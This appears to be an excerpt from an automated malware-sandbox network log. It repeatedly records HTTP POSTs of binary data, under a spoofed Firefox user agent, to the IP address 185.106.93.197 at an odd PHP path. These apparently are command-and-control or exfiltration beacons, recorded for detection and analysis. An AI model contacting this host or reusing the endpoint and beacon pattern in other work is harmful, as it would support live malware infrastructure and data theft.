Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1832Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1832Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1832Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
